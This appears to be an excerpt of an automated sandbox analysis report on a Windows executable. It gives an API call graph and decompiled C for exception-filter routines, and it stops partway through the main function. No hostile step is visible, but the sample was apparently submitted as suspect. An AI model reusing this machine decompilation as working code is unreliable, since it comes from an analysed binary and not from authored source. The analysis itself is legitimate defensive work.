3478->3479 3480 4035fd 3479->3480 3481 407750 RtlReAllocateHeap 3480->3481 3482 403664 3481->3482 3482->3201 3484 406526 RtlAllocateHeap 3483->3484 3487 403fb2 memset 3483->3487 3486 406567 RtlAllocateHeap 3484->3486 3484->3487 3486->3487 3487->3475 3489 40344f 3488->3489 3490 407750 RtlReAllocateHeap 3489->3490 3492 403496 3490->3492 3491 40358c 3491->3478 3492->3491 3492->3492 3493 403500 RtlAllocateHeap 3492->3493 3495 403520 3492->3495 3493->3495 3494 403579 HeapFree 3494->3491 3495->3491 3495->3494 3497 40662c 2 API calls 3496->3497 3498 406077 3497->3498 3499 40609a 3498->3499 3500 40607e CreateFileA 3498->3500 3502 4060bc 3499->3502 3503 40609f CreateFileA 3499->3503 3501 4060f9 3500->3501 3505 406149 3501->3505 3508 406106 RtlAllocateHeap 3501->3508 3502->3501 3504 4060c1 CreateFileA 3502->3504 3503->3501 3504->3501 3507 4060e3 CreateFileA 3504->3507 3506 40615c 3505->3506 3509 4066bb 2 API calls 3505->3509 3506->3236 3507->3501 3510 40613b 3508->3510 3509->3506 3510->3236 3777 404680 3778 404695 3777->3778 3782 40468d 3777->3782 3779 4046c4 RedrawWindow 3778->3779 3781 4046a8 3778->3781 3784 4048d6 RtlEnterCriticalSection 3778->3784 3781->3782 3790 404869 RtlEnterCriticalSection 3781->3790 3782->3779 3786 4048ec 3784->3786 3785 4048fb 3787 404919 RtlLeaveCriticalSection 3785->3787 3786->3785 3786->3787 3788 404902 DeleteObject 3786->3788 3787->3781 3789 40681d HeapFree 3788->3789 3789->3785 3791 404885 3790->3791 3792 4048c7 RtlLeaveCriticalSection 3791->3792 3793 4067da RtlAllocateHeap 3791->3793 3792->3782 3794 4048a9 3793->3794 3795 4048b1 CreateSolidBrush 3794->3795 3796 4048c6 3794->3796 3795->3796 3796->3792 3797 404700 3798 404711 3797->3798 3799 40470b 3797->3799 3800 4048d6 4 API calls 3799->3800 3800->3798 3538 4022c9 3570 4021e5 3538->3570 3539 406170 7 API calls 3539->3570 3540 4062d0 6 API calls 3540->3570 3541 405fd0 WriteFile HeapFree CloseHandle memset HeapFree 3541->3570 3542 403fa3 3 API calls 3542->3570 3543 4023a3 3544 4035d0 3 API calls 3543->3544 3545 4023c5 3544->3545 3547 4035f0 RtlReAllocateHeap 3545->3547 3546 406960 5 API calls 3546->3570 3551 4023d9 3547->3551 3548 4030f0 RtlAllocateHeap RtlReAllocateHeap 3548->3570 3549 406230 9 API calls 3549->3570 3550 402470 3553 407550 HeapFree 3550->3553 3551->3550 3552 4074f0 2 API calls 3551->3552 3554 402415 3552->3554 3555 402485 3553->3555 3556 4074f0 2 API calls 3554->3556 3557 407550 HeapFree 3555->3557 3558 40241f 3556->3558 3559 40248e 3557->3559 3560 4074f0 2 API calls 3558->3560 3561 407550 HeapFree 3559->3561 3562 402428 3560->3562 3564 402497 3561->3564 3565 4074f0 2 API calls 3562->3565 3563 4074f0 strlen RtlReAllocateHeap 3563->3570 3566 407550 HeapFree 3564->3566 3567 402432 3565->3567 3568 4024a0 3566->3568 3569 4074f0 2 API calls 3567->3569 3571 40243d 3569->3571 3570->3539 3570->3540 3570->3541 3570->3542 3570->3543 3570->3546 3570->3548 3570->3549 3570->3550 3570->3563 3574 4036a2 16 API calls 3570->3574 3576 402025 6 API calls 3570->3576 3572 4036a2 16 API calls 3571->3572 3573 402458 3572->3573 3573->3550 3575 402025 6 API calls 3573->3575 3574->3570 3575->3550 3576->3570 3577 4040ca HeapFree 3805 40208e 3806 4036a2 16 API calls 3805->3806 3807 4020a4 3806->3807 3578 4036d1 3579 4036f3 3578->3579 3580 4036d8 3578->3580 3580->3579 3581 4036de SendMessageA 3580->3581 3581->3579 3808 404714 GetWindowLongA 3809 4047a5 NtdllDefWindowProc_A 3808->3809 3810 40472c 3808->3810 3811 40479f 3809->3811 3812 404739 CallWindowProcA 3810->3812 3812->3811 3813 40475a RemovePropA RemovePropA 3812->3813 3815 404781 RevokeDragDrop 3813->3815 3816 404788 SetWindowLongA 3813->3816 3815->3816 3817 4066bb 2 API calls 3816->3817 3817->3811 3582 4044d5 SendMessageA 3818 401b95 FreeLibrary 3819 401b9f ExitProcess HeapDestroy ExitProcess 3818->3819 3583 404358 3584 404365 3583->3584 3585 404377 GetWindowLongA 3584->3585 3586 404393 CallWindowProcA 3584->3586 3589 404836 3585->3589 3590 404859 GetParent 3589->3590 3591 40438c PostMessageA 3590->3591 3592 404846 GetPropA 3590->3592 3591->3586 3592->3591 3593 404856 3592->3593 3593->3590 3829 407e1a sprintf GetPropA 3830 407ecb NtdllDefWindowProc_A 3829->3830 3834 407e4e 3829->3834 3832 407edd 3830->3832 3831 407eaf 3831->3830 3833 407eb4 CallWindowProcA 3831->3833 3833->3832 3834->3831 3835 407e97 HeapFree RemovePropA 3834->3835 3836 407e8d HeapFree 3834->3836 3835->3831 3836->3835 3837 405c1a IsWindowEnabled 3838 405c65 3837->3838 3839 405c2e IsWindowVisible 3837->3839 3839->3838 3840 405c39 GetWindowLongA 3839->3840 3840->3838 3841 405c49 3840->3841 3841->3838 3842 405c59 SetFocus 3841->3842 3842->3838 3595 4042dd 3596 4042f2 3595->3596 3597 404308 3595->3597 3598 4042fc IsWindowEnabled 3596->3598 3603 40434f 3596->3603 3599 404340 3597->3599 3600 40431c SetTextColor 3597->3600 3598->3597 3598->3603 3602 404348 SetBkColor 3599->3602 3599->3603 3600->3599 3601 40432a GetSysColor SetBkColor GetSysColorBrush 3600->3601 3601->3599 3602->3603 3604 4015dd 3606 4015b5 3604->3606 3605 40505e 21 API calls 3605->3606 3606->3605 3607 4015c5 _rmdir 3606->3607 3609 4015fc 3606->3609 3610 401645 3606->3610 3608 401ba4 ExitProcess HeapDestroy ExitProcess 3607->3608 3611 4045fc 4 API calls 3609->3611 3612 4045fc 4 API calls 3610->3612 3613 40160d 3611->3613 3614 401656 3612->3614 3615 4030f0 2 API calls 3613->3615 3616 4030f0 2 API calls 3614->3616 3617 401619 3615->3617 3618 401662 3616->3618 3619 404925 14 API calls 3617->3619 3620 404925 14 API calls 3618->3620 3621 401623 3619->3621 3620->3621 3622 406860 2 API calls 3621->3622 3623 401696 3622->3623 3624 403de0 RtlReAllocateHeap 3623->3624 3625 4016b4 3624->3625 3626 4016fd 3625->3626 3627 4016cf 3625->3627 3629 4020b1 6 API calls 3626->3629 3628 4036a2 16 API calls 3627->3628 3630 4016e5 _rmdir 3628->3630 3631 40170d 3629->3631 3630->3608 3632 401d3f 24 API calls 3631->3632 3633 401756 3632->3633 3634 403de0 RtlReAllocateHeap 3633->3634 3635 40176e 3634->3635 3636 4030f0 2 API calls 3635->3636 3637 40177a 3636->3637 3638 403de0 RtlReAllocateHeap 3637->3638 3639 401792 3638->3639 3640 4030f0 2 API calls 3639->3640 3641 40179e 3640->3641 3642 4020b1 6 API calls 3641->3642 3643 4017ae 3642->3643 3644 401a25 3643->3644 3645 403a18 3 API calls 3643->3645 3646 4074f0 2 API calls 3644->3646 3647 4017c7 3645->3647 3648 401a36 3646->3648 3649 403de0 RtlReAllocateHeap 3647->3649 3650 4074f0 2 API calls 3648->3650 3654 4017e5 3649->3654 3651 401a40 3650->3651 3652 4074f0 2 API calls 3651->3652 3653 401a4b 3652->3653 3655 4030f0 2 API calls 3653->3655 3654->3644 3657 40181c 3654->3657 3656 401a57 3655->3656 3658 406170 7 API calls 3656->3658 3659 405dd5 2 API calls 3657->3659 3660 401a67 3658->3660 3661 40182f 3659->3661 3662 401a87 3660->3662 3663 401a6b 3660->3663 3664 4036f8 25 API calls 3661->3664 3666 405ea0 DeleteFileA 3662->3666 3665 406250 6 API calls 3663->3665 3667 40184a 3664->3667 3668 401a7b 3665->3668 3669 401a92 3666->3669 3670 4030f0 2 API calls 3667->3670 3671 405fd0 5 API calls 3668->3671 3672 402025 6 API calls 3669->3672 3678 401856 3670->3678 3676 401a85 3671->3676 3673 401a97 3672->3673 3674 4036a2 16 API calls 3673->3674 3675 401aad _rmdir 3674->3675 3675->3608 3679 401adf 3676->3679 3682 402118 55 API calls 3676->3682 3677 4019c6 3680 403a79 4 API calls 3677->3680 3678->3677 3681 4074f0 2 API calls 3678->3681 3684 4074f0 2 API calls 3679->3684 3683 4019df 3680->3683 3685 40187a 3681->3685 3682->3679 3686 405e15 2 API calls 3683->3686 3687 401af6 3684->3687 3688 4030f0 2 API calls 3685->3688 3689 4019f3 3686->3689 3690 4074f0 2 API calls 3687->3690 3696 401886 3688->3696 3691 405e90 SetCurrentDirectoryA 3689->3691 3692 401b01 3690->3692 3693 401a07 _rmdir 3691->3693 3694 402761 6 API calls 3692->3694 3693->3608 3697 401b22 3694->3697 3695 4018a0 3699 406230 9 API calls 3695->3699 3696->3695 3698 402118 55 API calls 3696->3698 3700 402025 6 API calls 3697->3700 3698->3695 3701 4018b0 3699->3701 3702 401b2d 3700->3702 3703 401998 3701->3703 3706 405fd0 5 API calls 3701->3706 3704 405ea0 DeleteFileA 3702->3704 3707 406170 7 API calls 3703->3707 3705 401b38 3704->3705 3708 403a79 4 API calls 3705->3708 3709 4018c2 3706->3709 3710 4019a8 3707->3710 3711 401b51 3708->3711 3712 4074f0 2 API calls 3709->3712 3710->3677 3713 406250 6 API calls 3710->3713 3714 405e15 2 API calls 3711->3714 3715 4018de 3712->3715 3716 4019bc 3713->3716 3717 401b65 3714->3717 3718 4074f0 2 API calls 3715->3718 3719 405fd0 5 API calls 3716->3719 3720 405e90 SetCurrentDirectoryA 3717->3720 3721 4018e8 3718->3721 3719->3677 3722 401b79 _rmdir 3720->3722 3723 4074f0 2 API calls 3721->3723 3722->3608 3724 4018f3 3723->3724 3725 4074f0 2 API calls 3724->3725 3726 4018fd 3725->3726 3727 4074f0 2 API calls 3726->3727 3728 401908 3727->3728 3729 4036a2 16 API calls 3728->3729 3730 401923 3729->3730 3730->3703 3731 401939 3730->3731 3732 403a79 4 API calls 3731->3732 3733 401952 3732->3733 3734 405e15 2 API calls 3733->3734 3735 401966 3734->3735 3736 405e90 SetCurrentDirectoryA 3735->3736 3737 40197a _rmdir 3736->3737 3737->3608 3843 40409d RtlAllocateHeap 3844 40629e 3845 4062a0 3844->3845 3845->3845 3846 4062a9 WriteFile 3845->3846 3847 405b1f 3856 4056ef 3847->3856 3850 405b90 SetLastError 3852 405ba2 NtdllDefWindowProc_A 3850->3852 3853 405b7c 3850->3853 3851 405b41 GetPropA 3851->3850 3855 405b51 3851->3855 3852->3853 3854 405b86 DefFrameProcA 3854->3853 3855->3853 3855->3854 3857 405705 3856->3857 3895 40523f 3857->3895 3860 40572e GetPropA 3861 405743 GetParent 3860->3861 3862 405753 3860->3862 3861->3860 3861->3862 3863 4057b6 3862->3863 3870 405a10 3862->3870 3892 4057fa 3862->3892 3864 40598d 3863->3864 3865 4058e8 3863->3865 3866 4057ca 3863->3866 3867 405625 2 API calls 3864->3867 3864->3892 3868 4058f1 3865->3868 3869 4059ea 3865->3869 3871 4057d0 3866->3871 3872 405891 3866->3872 3867->3892 3868->3864 3879 405903 3868->3879 3868->3892 3874 4059fb EnumChildWindows 3869->3874 3869->3892 3870->3864 3876 405a44 3870->3876 3870->3892 3877 4057d9 3871->3877 3882 4057dc 3871->3882 3888 40582d 3871->3888 3875 40589b GetClientRect FillRect 3872->3875 3880 4058c1 3872->3880 3873 405685 RtlAllocateHeap 3873->3892 3874->3892 3875->3880 3881 405aad PostMessageA 3876->3881 3876->3892 3877->3882 3883 40580d 3877->3883 3879->3892 3939 405625 3879->3939 3880->3873 3881->3892 3882->3892 3935 405685 3882->3935 3885 405685 RtlAllocateHeap 3883->3885 3883->3892 3885->3892 3886 40591f 3889 405932 GetWindowLongA 3886->3889 3886->3892 3893 405958 3886->3893 3887 40585c 3891 405685 RtlAllocateHeap 3887->3891 3888->3887 3890 405685 RtlAllocateHeap 3888->3890 3888->3892 3889->3892 3890->3887 3891->3892 3892->3850 3892->3851 3893->3892 3942 405c70 GetActiveWindow GetFocus IsChild 3893->3942 3896 405253 3895->3896 3897 405266 3896->3897 3898 4053be 3896->3898 3902 405288 SystemParametersInfoA 3897->3902 3934 4053b6 3897->3934 3899 4053c8 MapWindowPoints 3898->3899 3900 405429 3898->3900 3953 4050c1 3899->3953 3903 405434 3900->3903 3904 4055e7 3900->3904 3906 40529f GetWindowRect GetWindowRect GetSystemMetrics GetSystemMetrics GetWindowLongA 3902->3906 3902->3934 3908 4055df ReleaseCapture 3903->3908 3913 405449 3903->3913 3907 4055ee 3904->3907 3904->3908 3910 4052f7 GetWindowLongA 3906->3910 3911 4052ef GetSystemMetrics 3906->3911 3912 4055f5 PostMessageA 3907->3912 3907->3934 3908->3934 3915 405318 3910->3915 3916 405308 GetSystemMetrics 3910->3916 3914 40530e GetSystemMetrics 3911->3914 3917 40560c SetCursorPos 3912->3917 3912->3934 3918 405454 3913->3918 3919 40558a GetCursorPos 3913->3919 3920 40531e 6 API calls 3914->3920 3915->3920 3916->3914 3917->3934 3921 40545b 3918->3921 3922 40552d GetCursorPos 3918->3922 3927 40548d 3919->3927 3932 405476 3919->3932 3923 405366 SetCapture PostMessageA 3920->3923 3924 405359 SendMessageA 3920->3924 3925 4054da GetCursorPos 3921->3925 3926 40545e 3921->3926 3922->3927 3922->3932 3929 405384 GetCursorPos LoadImageA SetCursor 3923->3929 3923->3934 3924->3923 3925->3927 3925->3932 3928 405465 GetCursorPos 3926->3928 3926->3934 3930 4054d2 3927->3930 3927->3932 3928->3927 3928->3932 3929->3934 3959 4051f1 SetCursorPos 3930->3959 3958 405093 SetCursorPos LoadImageA SetCursor 3932->3958 3934->3860 3934->3862 3934->3892 3936 4056a5 RtlAllocateHeap 3935->3936 3937 40569b 3935->3937 3938 4056b9 3936->3938 3937->3936 3937->3938 3938->3892 3940 405634 GetPropA GetWindowLongA 3939->3940 3941 405654 3939->3941 3940->3941 3941->3886 3947 405ca3 3942->3947 3948 405ce4 3942->3948 3943 405cac GetClassNameA strcmp 3946 405cd7 GetParent 3943->3946 3943->3947 3944 405cf2 EnumChildWindows 3949 405d35 3944->3949 3950 405d05 3944->3950 3945 405d15 EnumChildWindows 3945->3949 3951 405d2b EnumChildWindows 3945->3951 3946->3943 3946->3948 3947->3943 3947->3946 3947->3948 3948->3944 3948->3945 3949->3892 3950->3949 3952 405d0a SetFocus 3950->3952 3951->3949 3952->3949 3954 4050ce SendMessageA 3953->3954 3955 4051a3 GetWindowLongA 3954->3955 3956 4051d0 MoveWindow 3955->3956 3957 4051b8 GetParent MapWindowPoints 3955->3957 3956->3934 3957->3956 3958->3934 3960 4050c1 3959->3960 3961 405211 SendMessageA 3960->3961 3962 4051a3 4 API calls 3961->3962 3963 405238 3962->3963 3963->3934 3738 404662 3739 404671 3738->3739 3740 404675 DestroyWindow 3739->3740 3741 40467d 3739->3741 3740->3741 3964 404028 3965 404031 3964->3965 3966 40404e 3964->3966 3971 404052 3965->3971 3970 40403f HeapFree 3970->3966 3972 404062 3971->3972 3973 404077 3971->3973 3972->3973 3976 403128 HeapFree 3972->3976 3980 4065be 3973->3980 3976->3972 3977 40660e 3978 4065be 2 API calls 3977->3978 3979 406617 HeapFree 3978->3979 3979->3970 3981 4065d5 HeapFree 3980->3981 3982 4065e7 3980->3982 3981->3981 3981->3982 3983 4065ed HeapFree 3982->3983 3984 404037 3982->3984 3983->3983 3983->3984 3984->3977 3742 40416a 3743 40417a 3742->3743 3747 4041c6 3742->3747 3744 404193 SetTextColor 3743->3744 3745 4041b7 3743->3745 3744->3745 3746 4041a1 GetSysColor SetBkColor GetSysColorBrush 3744->3746 3745->3747 3748 4041bf SetBkColor 3745->3748 3746->3745 3748->3747 3985 401d2d 3986 401d2f 3985->3986 3987 407550 HeapFree 3986->3987 3988 401d38 3987->3988 3749 406bf0 3750 406c03 3749->3750 3751 406bf4 memset 3749->3751 3751->3750 3989 403b30 3990 403b3a 3989->3990 3991 403b62 3990->3991 3992 403b49 GetCurrentProcess TerminateProcess 3990->3992 3992->3991 3993 4044b3 3994 4044bc SendMessageA 3993->3994 3752 401ff5 3753 401ff7 3752->3753 3754 407550 HeapFree 3753->3754 3755 401fff 3754->3755 3756 403110 HeapFree 3755->3756 3757 402009 3756->3757 3758 403110 HeapFree 3757->3758 3759 402012 3758->3759 3760 403110 HeapFree 3759->3760 3761 40201b 3760->3761 3996 405bb5 IsWindowEnabled 3997 405c0b 3996->3997 3998 405bc9 IsWindowVisible 3996->3998 3998->3997 3999 405bd4 GetWindowLongA 3998->3999 3999->3997 4000 405be4 3999->4000 4001 405bfa 4000->4001 4002 405bef SetFocus 4000->4002 4001->3997 4003 405c00 SetFocus 4001->4003 4002->3997 4003->3997 3511 401bb9 3521 403b0b 3511->3521 3513 401bbe 3520 403cc0 SetUnhandledExceptionFilter 3513->3520 3515 401bc3 3527 404150 3515->3527 3519 401bd2 3520->3515 3522 403ad4 3521->3522 3523 403aeb 3522->3523 3524 403add CloseHandle 3522->3524 3525 403af4 HeapFree 3523->3525 3526 403b0a 3523->3526 3524->3523 3525->3526 3526->3513 3528 40415b 3527->3528 3529 404162 DestroyWindow 3528->3529 3530 401bcd 3528->3530 3529->3530 3531 404a13 3530->3531 3532 404a23 3531->3532 3533 404a4d 3532->3533 3534 404925 14 API calls 3532->3534 3535 404a7b 3533->3535 3536 404a62 HeapFree 3533->3536 3537 404a6d HeapFree 3533->3537 3534->3532 3535->3519 3536->3537 3537->3535 4004 40273a 4005 40273c 4004->4005 4006 407550 HeapFree 4005->4006 4007 402744 4006->4007 4008 403110 HeapFree 4007->4008 4009 40274e 4008->4009 4010 403110 HeapFree 4009->4010 4011 402757 4010->4011 3772 404a7e 3773 404ab1 3772->3773 3774 404a8a 3772->3774 3775 404aa3 HeapFree 3774->3775 3776 404a98 HeapFree 3774->3776 3775->3773 3776->3775

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403B70(_Unknown_base(*)()* _a4) {
                                                                                                                                                              				_Unknown_base(*)()* _t6;
                                                                                                                                                              				_Unknown_base(*)()* _t7;
                                                                                                                                                              				_Unknown_base(*)()* _t8;
                                                                                                                                                              				_Unknown_base(*)()* _t9;
                                                                                                                                                              
                                                                                                                                                              				 *0x40b1cc = _a4;
                                                                                                                                                              				_a4 = E00403B30;
                                                                                                                                                              				_t3 =  &_a4; // 0x403b30
                                                                                                                                                              				_t6 =  *_t3;
                                                                                                                                                              				if(_t6 == 0) {
                                                                                                                                                              					_t7 =  *0x40b1d0; // 0x0
                                                                                                                                                              					_t8 = SetUnhandledExceptionFilter(_t7);
                                                                                                                                                              					 *0x40b1d0 = 0;
                                                                                                                                                              					return _t8;
                                                                                                                                                              				} else {
                                                                                                                                                              					if( *0x40b1d0 != 0) {
                                                                                                                                                              						_a4 = _t6;
                                                                                                                                                              						goto ( *0x40a70c);
                                                                                                                                                              					}
                                                                                                                                                              					_t9 = SetUnhandledExceptionFilter(_t6); // executed
                                                                                                                                                              					 *0x40b1d0 = _t9;
                                                                                                                                                              					return _t9;
                                                                                                                                                              				}
                                                                                                                                                              			}







                                                                                                                                                              0x00403b74
                                                                                                                                                              0x00403b79
                                                                                                                                                              0x00403b90
                                                                                                                                                              0x00403b90
                                                                                                                                                              0x00403b96
                                                                                                                                                              0x00403bba
                                                                                                                                                              0x00403bc0
                                                                                                                                                              0x00403bc6
                                                                                                                                                              0x00403bd0
                                                                                                                                                              0x00403b98
                                                                                                                                                              0x00403b9f
                                                                                                                                                              0x00403ba1
                                                                                                                                                              0x00403ba5
                                                                                                                                                              0x00403ba5
                                                                                                                                                              0x00403bac
                                                                                                                                                              0x00403bb2
                                                                                                                                                              0x00403bb7
                                                                                                                                                              0x00403bb7

                                                                                                                                                              APIs
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNELBASE(0;@,00401302,00000000), ref: 00403BAC
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,00401302,00000000), ref: 00403BC0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                              • String ID: 0;@$0;@
                                                                                                                                                              • API String ID: 3192549508-1108649562
                                                                                                                                                              • Opcode ID: 17e2f879ba2802d5228fc4bc7392b6e56146e86dabbf6e7f46aef808ca8da191
                                                                                                                                                              • Instruction ID: 0d807a84263d1bb0884b5e8a86140cc1ab27614e37fc76056ab1af4718f505d2
                                                                                                                                                              • Opcode Fuzzy Hash: 17e2f879ba2802d5228fc4bc7392b6e56146e86dabbf6e7f46aef808ca8da191
                                                                                                                                                              • Instruction Fuzzy Hash: BFF0C9B4504300DBC701CF54DA6CA067BF8FB48746F00C53AE905A7261C778D910DB5E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403CC0() {
                                                                                                                                                              				_Unknown_base(*)()* _t1;
                                                                                                                                                              				_Unknown_base(*)()* _t2;
                                                                                                                                                              
                                                                                                                                                              				_t1 =  *0x40b1d0; // 0x0
                                                                                                                                                              				_t2 = SetUnhandledExceptionFilter(_t1); // executed
                                                                                                                                                              				 *0x40b1d0 = 0;
                                                                                                                                                              				return _t2;
                                                                                                                                                              			}





                                                                                                                                                              0x00403cc0
                                                                                                                                                              0x00403cc6
                                                                                                                                                              0x00403ccc
                                                                                                                                                              0x00403cd6

                                                                                                                                                              APIs
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNELBASE(00000000,00401BC3,00401BA9,00000001,00000010,OPS,00000000,00000000,00000000), ref: 00403CC6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                              • Opcode ID: f8f2f79aa34fb376b4ff93ccc1e767401dfd8d2f51a53d49510acf97ab4a8a46
                                                                                                                                                              • Instruction ID: d47e0acefe1b07befbc1d549b34453376f7af543b511f3b2cf7c13f8ad3f3650
                                                                                                                                                              • Opcode Fuzzy Hash: f8f2f79aa34fb376b4ff93ccc1e767401dfd8d2f51a53d49510acf97ab4a8a46
                                                                                                                                                              • Instruction Fuzzy Hash: 51B001B9500308DBDB019FA4EE7CB557BB8F74C785F848669EE01AB260C7789414CB9D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 401000-401124 memset GetModuleHandleA HeapCreate call 403000 call 407470 call 406807 call 406040 call 404ab3 call 4040e0 call 403d90 call 40393b call 403694 call 403ef0 call 403060 call 4030a0 call 403dc0 GetUserDefaultLangID VerLanguageNameA CharLowerA call 403de0 call 4030f0 call 403e30 call 4074c0 35 40112a-4011fa call 403108 * 13 0->35 36 4011ff-4012ca call 403108 * 13 0->36 87 4012cf-4012d9 call 403cd7 35->87 36->87 91 4012f6-401323 call 403b70 call 403a66 GetModuleHandleA 87->91 92 4012db-401b9f call 4036a2 87->92 101 401325 91->101 102 40138a-40139c call 4020b1 91->102 99 401ba4-401bb4 ExitProcess HeapDestroy ExitProcess 92->99 104 40132f-40133c 101->104 108 4013b5-4013d0 call 4036a2 102->108 109 40139e-4013e7 call 401bdd call 4020b1 102->109 104->102 106 40133e-401388 call 4074f0 * 2 call 403a18 call 4074f0 call 4030f0 104->106 106->104 108->99 122 4013e9-401441 call 403de0 call 4030f0 call 4020b1 109->122 123 40140f-40142a call 4036a2 109->123 137 401463-40147e call 4036a2 122->137 138 401443-401495 call 4020b1 122->138 123->99 137->99 144 4014b5-4014c7 call 4020b1 138->144 145 401497-4014b0 138->145 148 4014e7-4014f9 call 4020b1 144->148 149 4014c9-4014e2 144->149 145->144 152 401756-4017b0 call 403de0 call 4030f0 call 403de0 call 4030f0 call 4020b1 148->152 153 4014ff-4015b0 call 404de6 call 4042bd call 4043ae call 4045b3 call 404e09 call 4045d3 148->153 149->148 174 401a25-401a69 call 4074f0 * 3 call 4030f0 call 406170 152->174 175 4017b6-4017fe call 403a18 call 403de0 call 4074c0 152->175 179 4015b5-4015c3 call 40505e 153->179 221 401a87-401ac0 call 405ea0 call 402025 call 4036a2 _rmdir 174->221 222 401a6b-401ad2 call 406250 call 405fd0 call 4074c0 174->222 201 401800-401809 175->201 202 401812 175->202 188 4015e2-4015ea 179->188 189 4015c5-4015d8 _rmdir 179->189 190 40162b-401633 188->190 191 4015ec-4015fa call 405066 188->191 189->99 197 401672-401673 190->197 198 401635-401643 call 405074 190->198 206 401628-401629 191->206 207 4015fc-401626 call 4045fc call 4030f0 call 404925 191->207 197->179 210 401671 198->210 211 401645-40166f call 4045fc call 4030f0 call 404925 198->211 201->202 208 40180b-401810 201->208 204 401814-401816 202->204 204->174 212 40181c-401863 call 405dd5 call 4036f8 call 4030f0 call 4074c0 204->212 206->197 242 401678-4016cd call 4031f0 call 406860 call 403de0 call 4074c0 207->242 208->204 210->197 211->242 253 4019c6-401a20 call 403a79 call 405e15 call 405e90 _rmdir 212->253 254 401869-401893 call 4074f0 call 4030f0 call 4074c0 212->254 221->99 256 401ad4-401ada call 402118 222->256 257 401adf-401b92 call 4074f0 * 2 call 402761 call 402025 call 405ea0 call 403a79 call 405e15 call 405e90 _rmdir 222->257 279 4016fd-40170f call 4020b1 242->279 280 4016cf-4016f8 call 4036a2 _rmdir 242->280 253->99 283 4018a0-4018b2 call 406230 254->283 284 401895-40189b call 402118 254->284 256->257 257->99 294 401711-401716 279->294 295 40171b-401751 call 401d3f 279->295 280->99 297 401998-4019aa call 406170 283->297 298 4018b8-401937 call 405fd0 call 4074f0 * 5 call 4036a2 283->298 284->283 294->295 295->152 297->253 309 4019ac-4019c1 call 406250 call 405fd0 297->309 298->297 328 401939-401993 call 403a79 call 405e15 call 405e90 _rmdir 298->328 309->253 328->99
                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E00401000(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                              				void _t9;
                                                                                                                                                              				intOrPtr _t28;
                                                                                                                                                              				CHAR* _t62;
                                                                                                                                                              				int _t64;
                                                                                                                                                              				intOrPtr _t67;
                                                                                                                                                              				int _t70;
                                                                                                                                                              				CHAR* _t73;
                                                                                                                                                              				intOrPtr _t74;
                                                                                                                                                              				CHAR* _t75;
                                                                                                                                                              				int _t76;
                                                                                                                                                              				int _t78;
                                                                                                                                                              				int _t80;
                                                                                                                                                              				intOrPtr _t82;
                                                                                                                                                              				intOrPtr _t85;
                                                                                                                                                              				int _t88;
                                                                                                                                                              				int _t94;
                                                                                                                                                              				intOrPtr _t108;
                                                                                                                                                              				void* _t110;
                                                                                                                                                              				intOrPtr _t113;
                                                                                                                                                              				intOrPtr _t115;
                                                                                                                                                              				int _t118;
                                                                                                                                                              				intOrPtr _t120;
                                                                                                                                                              				intOrPtr _t121;
                                                                                                                                                              				intOrPtr _t126;
                                                                                                                                                              				intOrPtr _t127;
                                                                                                                                                              				void* _t129;
                                                                                                                                                              				intOrPtr _t146;
                                                                                                                                                              				intOrPtr _t147;
                                                                                                                                                              				intOrPtr _t148;
                                                                                                                                                              				void* _t150;
                                                                                                                                                              				intOrPtr _t163;
                                                                                                                                                              				intOrPtr _t167;
                                                                                                                                                              				void* _t168;
                                                                                                                                                              				intOrPtr _t169;
                                                                                                                                                              				intOrPtr _t171;
                                                                                                                                                              				int _t174;
                                                                                                                                                              				CHAR* _t177;
                                                                                                                                                              				intOrPtr _t181;
                                                                                                                                                              				CHAR* _t185;
                                                                                                                                                              				intOrPtr _t186;
                                                                                                                                                              				CHAR* _t187;
                                                                                                                                                              				CHAR* _t188;
                                                                                                                                                              				intOrPtr _t189;
                                                                                                                                                              				CHAR* _t190;
                                                                                                                                                              				intOrPtr _t193;
                                                                                                                                                              				int _t213;
                                                                                                                                                              				intOrPtr _t215;
                                                                                                                                                              				int _t216;
